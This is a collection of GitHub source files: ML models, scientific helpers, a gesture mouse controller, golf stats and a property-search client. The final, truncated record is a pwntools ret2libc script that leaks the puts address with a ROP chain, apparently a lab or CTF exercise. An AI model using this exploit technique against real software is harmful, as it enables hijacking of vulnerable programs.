2013-14 data.'\n\n zdatbeta = [2.5,3.8,5.0,5.9,7.0,8.0]\n betaMUVatM0 = [-1.7,-1.85,-1.91,-2.00,-2.05,-2.13]\n dbeta_dMUV = [-0.20,-0.11,-0.14,-0.20,-0.20,-0.15]\n\n _MUV0 = -19.5\n _c = -2.33\n\n betaM0 = np.interp(z, zdatbeta, betaMUVatM0, left=betaMUVatM0[0], right=betaMUVatM0[-1])\n dbetaM0 = (MUV - _MUV0).T * np.interp(z, zdatbeta, dbeta_dMUV, left=dbeta_dMUV[0], right=dbeta_dMUV[-1]) \n \n sol1 = (betaM0-_c) * np.exp(dbetaM0/(betaM0-_c))+_c #for MUV > MUV0\n sol2 = dbetaM0 + betaM0 #for MUV < MUV0\n \n return sol1.T * np.heaviside(MUV - _MUV0, 0.5) + sol2.T * np.heaviside(_MUV0 - MUV, 0.5)\n","repo_name":"JulianBMunoz/Zeus21","sub_path":"zeus21/UVLFs.py","file_name":"UVLFs.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"72384547129","text":"import numpy as np\n\nclass DQN():\n def __init__(self, policy_model, target_model, discount):\n self.policy_model = policy_model\n self.target_model = target_model\n self.update_target_weights()\n self.discount = discount\n\n\n def _get_qs(self, model, states) -> np.array:\n return model.predict(\n # Use [-3:] not to predict on batch size dimension\n np.array(states).reshape(-1,*states.shape[-3:]))\n\n\n def get_policy_qs(self, states) -> np.array:\n return self._get_qs(self.policy_model, states)\n\n\n def _valid_max_q(self, qs, valid_moves) -> float:\n mask = np.zeros(qs.shape[0], dtype=int)\n mask[valid_moves] = 1\n return np.max(qs[mask == True])\n\n\n def _prep_training_input(self, experiences):\n current_states = np.array([exp[0] for exp in experiences])\n future_states = np.array([exp[3] for exp in experiences])\n current_qs_list = self._get_qs(self.policy_model, current_states)\n future_qs_list = self._get_qs(self.target_model, future_states)\n\n X = []\n y = []\n for index, (state, action, reward, _, next_valid_moves,\n is_terminal_state) in enumerate(experiences):\n\n if not is_terminal_state:\n future_qs = future_qs_list[index]\n # Only consider valid moves for next state\n max_future_q = self._valid_max_q(future_qs, next_valid_moves)\n new_q = reward + self.discount * max_future_q\n else:\n new_q = reward\n\n current_qs = current_qs_list[index]\n current_qs[action] = new_q\n\n X.append(state)\n y.append(current_qs)\n return X, y\n\n\n def train(self, experiences, game_done, callbacks=None):\n X, y = self._prep_training_input(experiences)\n\n # Fit on all samples as one batch, log only on terminal state\n self.policy_model.model.fit(\n np.array(X),\n np.array(y),\n batch_size=len(experiences),\n verbose=0,\n shuffle=False,\n callbacks=callbacks if game_done else None)\n\n\n def update_target_weights(self):\n self.target_model.model.set_weights(\n self.policy_model.model.get_weights())\n","repo_name":"erikgrip/tictactoe_reinforcement_learning","sub_path":"tic_tac_toe/agent/algorithm/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13277304042","text":"import numpy as np\nfrom scipy.interpolate import RegularGridInterpolator\nfrom scipy.interpolate import UnivariateSpline\nfrom scipy.integrate import solve_ivp\n\n\ndef roi2splines(roi: dict) -> dict:\n \"\"\"Takes a dict of ROIs and returns a dict of fitted cubic splines.\n\n Iterates through all elements in roi and returns a dict of cubic splines.\n The returned dict has the same keys as roi. The function assumes that roi\n consists of 'polyline's.\n\n Note that the axis direction for each spline is switched!\n\n See also https://github.com/hadim/read-roi\n\n Args:\n roi (dict): A dict of dicts.\n\n Returns:\n dict: A dict with elements of type scipy.interpolate.UnivariateSpline\n\n \"\"\"\n spl = dict()\n for v in roi:\n x, y = removeduplicates(np.asarray(roi[v]['y']),\n np.asarray(roi[v]['x']))\n spl[v] = UnivariateSpline(x, y, k=3)\n return spl\n\n\ndef removeduplicates(x: np.array, y: np.array) -> (np.array, np.array):\n \"\"\"Takes to arrays of ints and removes entries that appear as duplicates in\n the first array.\n\n Args:\n x (np.array): The first array.\n y (np.array): The second array.\n\n Returns:\n np.array: Cleaned first array.\n np.array: Cleaned second array.\n \"\"\"\n seen = set()\n ind = []\n for k in range(x.size):\n if x[k] not in seen:\n seen.add(x[k])\n ind.append(k)\n\n xr = x[ind]\n yr = y[ind]\n return xr, yr\n\n\ndef compute_error(vel: np.array, roi, spl) -> dict:\n \"\"\"Takes a velocity array, a roi instance, fitted splines, and returns a\n dictionary of error arrays.\n\n Args:\n vel (np.array): The velocity.\n roi: A roi instance.\n spl: Fitted spolines.\n\n Returns:\n error (dict): A dictionary of errors.\n \"\"\"\n m, n = vel.shape\n grid1 = np.linspace(0, m - 1, m)\n grid2 = np.linspace(0, n - 1, n)\n rgi = RegularGridInterpolator(points=[grid1, grid2], values=vel,\n method='linear', bounds_error=False,\n fill_value=0)\n\n error = dict()\n for v in roi:\n y = roi[v]['y']\n\n # Interpolate velocity.\n y = np.arange(y[0], y[-1] + 1, 1)\n x = np.array(spl[v](y))\n veval = rgi((y, x))\n\n # Compute derivative of spline.\n derivspl = spl[v].derivative()\n\n # Compute error in velocity.\n error[v] = abs(derivspl(y) * m / n - veval)\n return error\n\n\ndef compute_endpoint_error(vel: np.array, roi, spl) -> (dict, dict):\n \"\"\"Takes a velocity array, a roi instance, fitted splines, and returns a\n dictionary of error arrays.\n\n Args:\n vel (np.array): The velocity.\n roi: A roi instance.\n spl: Fitted spolines.\n\n Returns:\n error (dict): A dictionary of errors.\n curve (dict): A dictionary of points of the trajectory.\n \"\"\"\n m, n = vel.shape\n grid1 = np.linspace(0, m - 1, m)\n grid2 = np.linspace(0, n - 1, n)\n rgi = RegularGridInterpolator(points=[grid1, grid2], values=vel,\n method='linear', bounds_error=False,\n fill_value=0)\n\n # Scale according to grid.\n hx, hy = 1.0 / (m - 1), 1.0 / (n - 1)\n vel = vel * hx / hy\n\n # Define ODE.\n def ode(t, y): return rgi((t, y))\n\n error = dict()\n curve = dict()\n for v in roi:\n y = roi[v]['y']\n\n # Interpolate velocity.\n y = np.arange(y[0], y[-1] + 1, 1)\n x = np.array(spl[v](y))\n\n # Solve initial value problem.\n sol = solve_ivp(ode, [y[0], y[-1]], [x[0]], t_eval=y, method='RK45')\n\n # Compute error in velocity.\n error[v] = abs(x - sol.y[0, :])\n curve[v] = sol.y[0, :]\n return error, curve\n","repo_name":"lukaslang/ofmc","sub_path":"ofmc/util/roihelpers.py","file_name":"roihelpers.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71151751288","text":"\"\"\"\n This class extends LineBuilder to draw function on matplotlib figures.\n\n !!!!! Disclaimer !!!!!\n To draw on the matplotlib window you have to disable SciView on PyCharm:\n File -> Settings -> Tools -> Python Scientific -> deselect option\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom project.dia_pckg.chart_drawer.LineBuilder import LineBuilder\n\n\nclass FunctionBuilder(LineBuilder):\n\n def __init__(self, x_interval, y_interval):\n \"\"\"\n :param x_interval: [x0, x1]\n :param y_interval: [y0, y1]\n \"\"\"\n\n self.x_interval = x_interval\n self.y_interval = y_interval\n\n # initialize plot window\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlim(x_interval[0], x_interval[1])\n ax.set_ylim(y_interval[0], y_interval[1])\n line, = ax.plot([], []) # empty line\n super().__init__(line)\n\n self.last_xdata = x_interval[0]\n\n def start(self):\n plt.show()\n\n def __call__(self, event):\n if event.inaxes != self.line.axes:\n return\n if event.xdata < self.last_xdata:\n return\n\n self.xs.append(event.xdata)\n self.ys.append(event.ydata)\n self.line.set_data(self.xs, self.ys)\n self.line.figure.canvas.draw()\n\n self.last_xdata = event.xdata\n\n def get_xydata(self):\n \"\"\"\n :return: x, y as numpy arrays\n \"\"\"\n x = self.line.get_xdata()\n y = self.line.get_ydata()\n return np.asarray(x), np.asarray(y)\n","repo_name":"damiano1996/DataIntelligenceApplications","sub_path":"project/dia_pckg/chart_drawer/FunctionBuilder.py","file_name":"FunctionBuilder.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11105166748","text":"import cv2\nimport mediapipe as mp\nimport pyautogui\nimport math\nfrom enum import IntEnum\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\nfrom google.protobuf.json_format import MessageToDict\nimport screen_brightness_control as sbcontrol\n\npyautogui.FAILSAFE = False\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\n# Gesture Encodings \nclass Gest(IntEnum):\n # Binary Encoded\n FIST = 0\n PINKY = 1\n RING = 2\n MID = 4\n LAST3 = 7\n INDEX = 8\n FIRST2 = 12\n LAST4 = 15\n THUMB = 16 \n PALM = 31\n \n # Extra Mappings\n V_GEST = 33\n TWO_FINGER_CLOSED = 34\n PINCH_MAJOR = 35\n PINCH_MINOR = 36\n\n# Multi-handedness Labels\nclass HLabel(IntEnum):\n MINOR = 1\n MAJOR = 1\n\n# Convert Mediapipe Landmarks to recognizable Gestures\nclass HandRecog:\n \n def __init__(self, hand_label):\n self.finger = 0\n self.ori_gesture = Gest.PALM\n self.prev_gesture = Gest.PALM\n self.frame_count = 0\n self.hand_result = None\n self.hand_label = hand_label\n \n def update_hand_result(self, hand_result):\n self.hand_result = hand_result\n\n def get_signed_dist(self, point):\n sign = -1\n if self.hand_result.landmark[point[0]].y < self.hand_result.landmark[point[1]].y:\n sign = 1\n dist = (self.hand_result.landmark[point[0]].x - self.hand_result.landmark[point[1]].x)**2\n dist += (self.hand_result.landmark[point[0]].y - self.hand_result.landmark[point[1]].y)**2\n dist = math.sqrt(dist)\n return dist*sign\n \n def get_dist(self, point):\n dist = (self.hand_result.landmark[point[0]].x - self.hand_result.landmark[point[1]].x)**2\n dist += (self.hand_result.landmark[point[0]].y - self.hand_result.landmark[point[1]].y)**2\n dist = math.sqrt(dist)\n return dist\n \n def get_dz(self,point):\n return abs(self.hand_result.landmark[point[0]].z - self.hand_result.landmark[point[1]].z)\n \n # Function to find Gesture Encoding using current finger_state.\n # Finger_state: 1 if finger is open, else 0\n def set_finger_state(self):\n if self.hand_result == None:\n return\n\n points = [[8,5,0],[12,9,0],[16,13,0],[20,17,0]]\n self.finger = 0\n self.finger = self.finger | 0 #thumb\n for idx,point in enumerate(points):\n \n dist = self.get_signed_dist(point[:2])\n dist2 = self.get_signed_dist(point[1:])\n \n try:\n ratio = round(dist/dist2,1)\n except:\n ratio = round(dist/0.01,1)\n\n self.finger = self.finger << 1\n if ratio > 0.5 :\n self.finger = self.finger | 1\n \n\n # Handling Fluctations due to noise\n def get_gesture(self):\n if self.hand_result == None:\n return Gest.PALM\n\n current_gesture = Gest.PALM\n if self.finger in [Gest.LAST3,Gest.LAST4] and self.get_dist([8,4]) < 0.05:\n if self.hand_label == HLabel.MINOR :\n current_gesture = Gest.PINCH_MINOR\n else:\n current_gesture = Gest.PINCH_MAJOR\n\n elif Gest.FIRST2 == self.finger :\n point = [[8,12],[5,9]]\n dist1 = self.get_dist(point[0])\n dist2 = self.get_dist(point[1])\n ratio = dist1/dist2\n if ratio > 1.7:\n current_gesture = Gest.V_GEST\n else:\n if self.get_dz([8,12]) < 0.1:\n current_gesture = Gest.TWO_FINGER_CLOSED\n else:\n current_gesture = Gest.MID\n \n else:\n current_gesture = self.finger\n \n if current_gesture == self.prev_gesture:\n self.frame_count += 1\n else:\n self.frame_count = 0\n\n self.prev_gesture = current_gesture\n\n if self.frame_count > 4 :\n self.ori_gesture = current_gesture\n return self.ori_gesture\n\n# Executes commands according to detected gestures\nclass Controller:\n tx_old = 0\n ty_old = 0\n trial = True\n flag = False\n grabflag = False\n pinchmajorflag = False\n pinchminorflag = False\n pinchstartxcoord = None\n pinchstartycoord = None\n pinchdirectionflag = None\n prevpinchlv = 0\n pinchlv = 0\n framecount = 0\n prev_hand = None\n pinch_threshold = 0.3\n \n def getpinchylv(hand_result):\n dist = round((Controller.pinchstartycoord - hand_result.landmark[8].y)*10,1)\n return dist\n\n def getpinchxlv(hand_result):\n dist = round((hand_result.landmark[8].x - Controller.pinchstartxcoord)*10,1)\n return dist\n \n def changesystembrightness():\n currentBrightnessLv = sbcontrol.get_brightness()/100.0\n currentBrightnessLv += Controller.pinchlv/50.0\n if currentBrightnessLv > 1.0:\n currentBrightnessLv = 1.0\n elif currentBrightnessLv < 0.0:\n currentBrightnessLv = 0.0 \n sbcontrol.fade_brightness(int(100*currentBrightnessLv) , start = sbcontrol.get_brightness())\n \n def changesystemvolume():\n devices = AudioUtilities.GetSpeakers()\n interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\n volume = cast(interface, POINTER(IAudioEndpointVolume))\n currentVolumeLv = volume.GetMasterVolumeLevelScalar()\n currentVolumeLv += Controller.pinchlv/50.0\n if currentVolumeLv > 1.0:\n currentVolumeLv = 1.0\n elif currentVolumeLv < 0.0:\n currentVolumeLv = 0.0\n volume.SetMasterVolumeLevelScalar(currentVolumeLv, None)\n \n def scrollVertical():\n pyautogui.scroll(120 if Controller.pinchlv>0.0 else -120)\n \n \n def scrollHorizontal():\n pyautogui.keyDown('shift')\n pyautogui.keyDown('ctrl')\n pyautogui.scroll(-120 if Controller.pinchlv>0.0 else 120)\n pyautogui.keyUp('ctrl')\n pyautogui.keyUp('shift')\n\n # Locate Hand to get Cursor Position\n # Stabilize cursor by Dampening\n def get_position(hand_result):\n point = 9\n position = [hand_result.landmark[point].x ,hand_result.landmark[point].y]\n sx,sy = pyautogui.size()\n x_old,y_old = pyautogui.position()\n x = int(position[0]*sx)\n y = int(position[1]*sy)\n if Controller.prev_hand is None:\n Controller.prev_hand = x,y\n delta_x = x - Controller.prev_hand[0]\n delta_y = y - Controller.prev_hand[1]\n\n distsq = delta_x**2 + delta_y**2\n ratio = 1\n Controller.prev_hand = [x,y]\n\n if distsq <= 25:\n ratio = 0\n elif distsq <= 900:\n ratio = 0.07 * (distsq ** (1/2))\n else:\n ratio = 2.1\n x , y = x_old + delta_x*ratio , y_old + delta_y*ratio\n return (x,y)\n\n def pinch_control_init(hand_result):\n Controller.pinchstartxcoord = hand_result.landmark[8].x\n Controller.pinchstartycoord = hand_result.landmark[8].y\n Controller.pinchlv = 0\n Controller.prevpinchlv = 0\n Controller.framecount = 0\n\n # Hold final position for 5 frames to change status\n def pinch_control(hand_result, controlHorizontal, controlVertical):\n if Controller.framecount == 5:\n Controller.framecount = 0\n Controller.pinchlv = Controller.prevpinchlv\n\n if Controller.pinchdirectionflag == True:\n controlHorizontal() #x\n\n elif Controller.pinchdirectionflag == False:\n controlVertical() #y\n\n lvx = Controller.getpinchxlv(hand_result)\n lvy = Controller.getpinchylv(hand_result)\n \n if abs(lvy) > abs(lvx) and abs(lvy) > Controller.pinch_threshold:\n Controller.pinchdirectionflag = False\n if abs(Controller.prevpinchlv - lvy) < Controller.pinch_threshold:\n Controller.framecount += 1\n else:\n Controller.prevpinchlv = lvy\n Controller.framecount = 0\n\n elif abs(lvx) > Controller.pinch_threshold:\n Controller.pinchdirectionflag = True\n if abs(Controller.prevpinchlv - lvx) < Controller.pinch_threshold:\n Controller.framecount += 1\n else:\n Controller.prevpinchlv = lvx\n Controller.framecount = 0\n\n def handle_controls(gesture, hand_result): \n x,y = None,None\n if gesture != Gest.PALM :\n x,y = Controller.get_position(hand_result)\n \n # flag reset\n if gesture != Gest.FIST and Controller.grabflag:\n Controller.grabflag = False\n pyautogui.mouseUp(button = \"left\")\n\n if gesture != Gest.PINCH_MAJOR and Controller.pinchmajorflag:\n Controller.pinchmajorflag = False\n\n if gesture != Gest.PINCH_MINOR and Controller.pinchminorflag:\n Controller.pinchminorflag = False\n\n # implementation\n if gesture == Gest.V_GEST:\n Controller.flag = True\n pyautogui.moveTo(x, y, duration = 0.1)\n\n elif gesture == Gest.FIST:\n if not Controller.grabflag : \n Controller.grabflag = True\n pyautogui.mouseDown(button = \"left\")\n pyautogui.moveTo(x, y, duration = 0.1)\n\n elif gesture == Gest.MID and Controller.flag:\n pyautogui.click()\n Controller.flag = False\n\n elif gesture == Gest.INDEX and Controller.flag:\n pyautogui.click(button='right')\n Controller.flag = False\n\n elif gesture == Gest.TWO_FINGER_CLOSED and Controller.flag:\n pyautogui.doubleClick()\n Controller.flag = False\n\n elif gesture == Gest.PINCH_MINOR:\n if Controller.pinchminorflag == False:\n Controller.pinch_control_init(hand_result)\n Controller.pinchminorflag = True\n Controller.pinch_control(hand_result,Controller.scrollHorizontal, Controller.scrollVertical)\n \n elif gesture == Gest.PINCH_MAJOR:\n if Controller.pinchmajorflag == False:\n Controller.pinch_control_init(hand_result)\n Controller.pinchmajorflag = True\n Controller.pinch_control(hand_result,Controller.changesystembrightness, Controller.changesystemvolume)\n \n'''\n---------------------------------------- Main Class ----------------------------------------\n Entry point of Gesture Controller\n'''\n\n\nclass GestureController:\n gc_mode = 0\n cap = None\n CAM_HEIGHT = None\n CAM_WIDTH = None\n hr_major = True # Right Hand by default\n hr_minor = True # Left hand by default\n dom_hand = True\n\n def __init__(self):\n GestureController.gc_mode = 1\n GestureController.cap = cv2.VideoCapture(0)\n GestureController.CAM_HEIGHT = GestureController.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n GestureController.CAM_WIDTH = GestureController.cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n \n def classify_hands(results):\n left , right = None,None\n try:\n handedness_dict = MessageToDict(results.multi_handedness[0])\n if handedness_dict['classification'][0]['label'] == 'Right':\n right = results.multi_hand_landmarks[0]\n else :\n left = results.multi_hand_landmarks[0]\n except:\n pass\n\n try:\n handedness_dict = MessageToDict(results.multi_handedness[1])\n if handedness_dict['classification'][0]['label'] == 'Right':\n right = results.multi_hand_landmarks[1]\n else :\n left = results.multi_hand_landmarks[1]\n except:\n pass\n \n if GestureController.dom_hand == True:\n GestureController.hr_major = right\n GestureController.hr_minor = left\n else :\n GestureController.dom_hand == True\n GestureController.hr_major = left\n GestureController.hr_minor = right\n\n def start(self):\n \n handmajor = HandRecog(HLabel.MAJOR)\n handminor = HandRecog(HLabel.MINOR)\n\n with mp_hands.Hands(max_num_hands = 2,min_detection_confidence=0.5, min_tracking_confidence=0.5) as hands:\n while GestureController.cap.isOpened() and GestureController.gc_mode:\n success, image = GestureController.cap.read()\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n continue\n \n image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = hands.process(image)\n \n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks: \n GestureController.classify_hands(results)\n handmajor.update_hand_result(GestureController.hr_major)\n handminor.update_hand_result(GestureController.hr_minor)\n\n handmajor.set_finger_state()\n handminor.set_finger_state()\n gest_name = handminor.get_gesture()\n\n if gest_name == Gest.PINCH_MINOR:\n Controller.handle_controls(gest_name, handminor.hand_result)\n else:\n gest_name = handmajor.get_gesture()\n Controller.handle_controls(gest_name, handmajor.hand_result)\n \n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS)\n else:\n Controller.prev_hand = None\n cv2.imshow('Gesture Controller', image)\n if cv2.waitKey(5) & 0xFF == 13:\n break\n GestureController.cap.release()\n cv2.destroyAllWindows()\n\n# uncomment to run directly\ngc1 = GestureController()\ngc1.start()\n","repo_name":"larymak/Python-project-Scripts","sub_path":"OTHERS/Virtual_Mouse-main/Virtual_Mouse.py","file_name":"Virtual_Mouse.py","file_ext":"py","file_size_in_byte":14175,"program_lang":"python","lang":"en","doc_type":"code","stars":929,"dataset":"github-code","pt":"77"} +{"seq_id":"30751947536","text":"## Define Res-CRANN architecture \nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport keras\nimport matplotlib.pyplot as plt\n\n\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import BatchNormalization\nfrom sklearn.metrics import confusion_matrix\nfrom keras.models import model_from_json\nfrom keras.layers import Input\nfrom keras.layers import Activation, Reshape, LSTM, TimeDistributed, Dot, Concatenate\nfrom keras.models import Model\n\n\n## Load pretrained ResNet50 model on our dataset to create ResCRANN model\njson_file = open('model_final_ResNet50_straighten.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\n\n## Load pretrained ResNet50 weights\nloaded_model.load_weights(\"model_final_ResNet50_straighten.h5\")\nprint(\"Loaded model from disk\")\nloaded_model.layers.pop() # Get rid of the classification layer\nloaded_model.layers.pop() # Get rid of the dropout layer\nloaded_model.layers.pop()\n\ninput_tensor = Input(shape=(32, 128, 1)) \ninput_length = Input((1,))\ninput_area = Input((1,))\n\nbase_model = Model(inputs=[loaded_model.input, input_length, input_area],outputs=loaded_model.get_layer('activation_48').output)\nfor layer in loaded_model.layers[:-3]:\n layer.trainable=False\n\nX = base_model([input_tensor, input_length, input_area]) \nprint(X.shape)\nX = Reshape((2*5,2048))(X)\n\nactivations = LSTM(128, return_sequences=True, dropout=0.25)(X)\n\n## Attention layer\nattention = TimeDistributed(Dense(1, activation='tanh'))(activations) \nattention = Flatten()(attention)\nattention = Activation('softmax')(attention)\n\nactivations = Dot(axes=1, normalize=True)([activations, attention])\n\nactivations = Concatenate()([activations, input_length, input_area])\nX = BatchNormalization()(activations)\nX = Dropout(0.5)(X)\noutputs = Dense(24,\n activation='softmax',\n kernel_initializer='he_normal')(X)\n\nResCRANN = Model([input_tensor, input_length, input_area], outputs)\n\n\nResCRANN.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(lr=0.001, epsilon=1e-8),\n metrics=['accuracy'])\n\n\nResCRANN.summary()\n\nhistory_ResCRANN = ResCRANN.fit([X_train, X_length_train, X_area_train], y_train,\n batch_size=64,\n epochs=20,\n verbose=1,\n validation_data=([X_valid, X_length_valid, X_area_valid], y_valid))\n\n\n\n## Serialize model to JSON\nmodel_json = ResCRANN.to_json()\nwith open(\"model_final_ResCRNN.json\", \"w\") as json_file:\n json_file.write(model_json)\n \n## Serialize weights to HDF5\nResCRANN.save_weights(\"model_final_ResCRNN.h5\")\nprint(\"Saved model to disk\") \n\nscore_ResCRANN = ResCRANN.evaluate([X_test, X_length_test, X_area_test], y_test, verbose=0)\nprint('Test loss:', score_ResCRANN[0])\nprint('Test accuracy:', score_ResCRANN[1])\n\naccuracy = history_ResCRANN.history['accuracy']\nval_accuracy = history_ResCRANN.history['val_accuracy']\nloss = history_ResCRANN.history['loss']\nval_loss = history_ResCRANN.history['val_loss']\nepochs = range(len(accuracy))\n\nplt.plot(epochs, accuracy, 'bo', label='Training accuracy')\nplt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\nplt.title('Training accuracy')\nplt.legend()\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training loss')\nplt.legend()\nplt.show()\n\ny_pred = ResCRANN.predict([X_test, X_length_test, X_area_test])\ny_pred = np.argmax(y_pred,1)\ncm = confusion_matrix(np.argmax(y_test,1), y_pred)\n\ndf_cm = pd.DataFrame(cm, range(24),\n range(24))\nplt.figure(figsize = (24,24))\nsn.set(font_scale=1)\nsn.heatmap(df_cm, annot=True,annot_kws={\"size\": 10})\n","repo_name":"EnsiehKhazaei/Karyotype","sub_path":"classification/Res-CRNN.py","file_name":"Res-CRNN.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"10258467676","text":" \ndef calcHandicap(rounds, diffList):\n handicapDiff = diffList[:]\n x = 0\n total = 0\n if rounds <= 6:\n diffUsed = 1\n elif rounds <=8:\n diffUsed = 2\n elif rounds <= 10:\n diffUsed = 3\n elif rounds <= 12:\n diffUsed = 4\n elif rounds <= 14:\n diffUsed = 5\n elif rounds <= 16:\n diffUsed = 6\n elif rounds == 17:\n diffUsed = 7\n elif rounds == 18:\n diffUsed = 8\n elif rounds == 19:\n diffUsed = 9\n elif rounds >= 20:\n diffUsed = 10 \n while x < diffUsed:\n low = min(handicapDiff)\n handicapDiff.remove(low)\n total = total+low\n x += 1\n handicap = (.96*(total/diffUsed))\n handicap = round(handicap, 2)\n return handicap\n \ndef yearAverages(rounds):\n roundsplayed = len(rounds)\n avgScore = 0\n avgPutts = 0\n avgFH = 0\n avgGIR = 0\n for x in range(0, roundsplayed):\n year = rounds[x].date.year\n avgScore += rounds[x].strokes\n avgPutts += rounds[x].putts\n avgFH += rounds[x].fairways_hit\n avgGIR += rounds[x].gir\n avgScore = avgScore/roundsplayed\n avgPutts = avgPutts/roundsplayed \n avgFH = avgFH/roundsplayed\n avgGIR = avgGIR/roundsplayed\n return (year, roundsplayed, avgScore, avgPutts, avgFH, avgGIR)\n\ndef strokesGraph(rounds):\n scores = []\n for round in rounds:\n scores.append(round.strokes)\n return scores\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HunterProgram22/golfsite","sub_path":"rounds/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21425653028","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Nicolas Rivet\r\n\"\"\"\r\nimport configparser\r\n\r\nimport requests\r\nfrom lxml import etree as ET\r\n\r\napi_url='http://ws.seloger.com'\r\n\r\ndef define_search(title):\r\n \"\"\"\r\n cp, nb_pieces, nb_chambres, pxmin, pxmax, surfacemin=define_search('Paris_1-5')\r\n \"\"\"\r\n config = configparser.ConfigParser()\r\n config.read('mysearch.ini')\r\n\r\n return config[title]['cp'], \\\r\n config[title]['nb_pieces'], \\\r\n config[title]['nb_chambres'], \\\r\n config[title]['pxmin'], \\\r\n config[title]['pxmax'], \\\r\n config[title]['surfacemin']\r\n\r\n\r\ndef search_buy(cp, nb_pieces=0, nb_chambres=0, pxmin=0, pxmax=0, surfacemin=0):\r\n \"\"\"\r\n r=search_buy(75001, '4,+5', '3,4', 500000, 800000,70)\r\n xml=r.content\r\n r=search_buy(cp, nb_pieces, nb_chambres, pxmin, pxmax, surfacemin)\r\n \"\"\"\r\n api_endpoint=api_url + '/search.xml?idtt=2&cp=' + str(cp)\r\n if nb_pieces!=0:\r\n api_endpoint=api_endpoint + '&np_pieces=' + str(nb_pieces)\r\n if nb_chambres!=0:\r\n api_endpoint=api_endpoint + '&nb_chambres=' + str(nb_chambres)\r\n if pxmin!=0:\r\n api_endpoint=api_endpoint + '&pxmin=' + str(pxmin)\r\n if pxmax!=0:\r\n api_endpoint=api_endpoint + '&pxmax=' + str(pxmax)\r\n if surfacemin!=0:\r\n api_endpoint=api_endpoint + '&surfacemin=' + str(surfacemin)\r\n \r\n print(api_endpoint)\r\n \r\n response = requests.get(api_endpoint)\r\n return response\r\n\r\n \r\ndef look_search(xml):\r\n \r\n tree = ET.fromstring(xml)\r\n idAnnonces=tree.xpath('//recherche//annonces//annonce//idAnnonce')\r\n annonces=[]\r\n for annonce in idAnnonces:\r\n annonces.append(annonce.text)\r\n dtFraicheurs=tree.xpath('//recherche//annonces//annonce//dtFraicheur')\r\n dts=[]\r\n for dt in dtFraicheurs:\r\n dts.append(dt.text)\r\n return annonces, dts\r\n \r\n\"\"\"\r\nPOST https://outlook.office.com/api/v2.0/me/sendmail\r\n\r\n{\r\n \"Message\": {\r\n \"Subject\": \"Meet for lunch?\",\r\n \"Body\": {\r\n \"ContentType\": \"Text\",\r\n \"Content\": \"The new cafeteria is open.\"\r\n },\r\n \"ToRecipients\": [\r\n {\r\n \"EmailAddress\": {\r\n \"Address\": \"garthf@a830edad9050849NDA1.onmicrosoft.com\"\r\n }\r\n }\r\n ],\r\n \"Attachments\": [\r\n {\r\n \"@odata.type\": \"#Microsoft.OutlookServices.FileAttachment\",\r\n \"Name\": \"menu.txt\",\r\n \"ContentBytes\": \"bWFjIGFuZCBjaGVlc2UgdG9kYXk=\"\r\n }\r\n ]\r\n },\r\n \"SaveToSentItems\": \"false\"\r\n}\r\n\"\"\"\r\n","repo_name":"nrivet84/seloger","sub_path":"seloger.py","file_name":"seloger.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"9490238695","text":"from pwn import *\n\n# Parse our binary file\nelf = ELF(\"./rop\")\n\n# Initialize pwn ROP engine\nrop = ROP(elf)\n\n# Create a debug process and load the libc\np = gdb.debug(\"./rop\",'''\nbreak main\ncontinue''')\n\nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n# Stage 1: Infering libc address\n\nputs_got = elf.got['puts']\nputs_plt = elf.plt['puts']\nmain_plt = elf.symbols['main']\n\n# Find pop_rdi gadgets\npop_rdi = rop.find_gadget(['pop rdi','ret'])[0]\npayload = b'A'*0x28\n# Build first chain\nrop_chain = [ pop_rdi, # puts prints the content of a pointer stored in rdi, the content is the address of the puts function\n puts_got, # address of a GOT entry for puts\n puts_plt, # address of the puts function \n main_plt # address of the main function\n ]\n\nrop_chain = b''.join([p64(i) for i in rop_chain])\nfirst_payload = payload + rop_chain\nprint(p.recvline())\np.sendline(first_payload)\nreceived = p.recvline().strip()\nputs_addr = u64(received.ljust(8,b'\\x00'))\nlog.success(\"leaked puts addr: \"+ hex(puts_addr))\nlibc.address = 